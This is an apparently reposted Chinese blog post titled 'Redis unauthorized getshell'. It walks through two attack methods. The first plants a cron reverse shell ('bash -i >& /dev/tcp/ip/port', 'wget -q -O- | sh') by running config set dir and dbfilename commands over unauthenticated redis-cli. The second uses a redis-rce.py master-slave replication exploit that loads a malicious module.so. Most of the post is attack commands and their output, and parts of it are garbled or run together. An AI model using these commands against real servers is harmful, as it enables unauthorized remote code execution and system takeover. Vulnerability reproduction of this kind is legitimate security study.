漏洞复现-redis未授权getshell

漏洞复现-redis未授权getshell

redis未授权getshell

​​简介：​​​​任务 getshell​​​​主从复制 getshell​​

简介：

Redis是一个开源的使用ANSI C语言编写、 支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，

并提供多种语言的API。 作为一个高性能的key-value数据库， Redis在部分场景下对关系数据库起到很好的补充作用。

任务 getshell

:\hack\envir\redis>redis-cli -h 120.xx.xx.4

rdm客户端 — info 打印 一下 未授权 Linux服务器

"\n* * * * * bash -i >& /dev/tcp/ip/端口 0>&1\n" */3 * * * * root wget -q -O- | sh

tw:0>config set dir /var/spool/cron/"ERR Changing directory: No such file or directory"尝试其他办法tw2:0>config set dir /var/spool/cron/"OK"tw2:0>tw2:0>config set dbfilename root"OK"save140.112.90.153:6379> save(error) ERR原因分析：启动redis-server服务时，没有root权限解决方案：sudo kill -9 pid #将redis服务杀掉sudo redis-server ***/redis.config #sudo使用root权限启动

主从复制 getshell

git clone clone 文件

# cp /home/amingmm/RedisModules-ExecuteCommand/module.so /home/amingmm/RedisModules-ExecuteCommand/redis-rce

把生成的moudle.so复制到redis-rce目录里面，之后进入redis-rce目录里面输入

-rce.py -r 192.168.111.132 -p 6379 -L 192.168.111.130 -f moudle.so

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。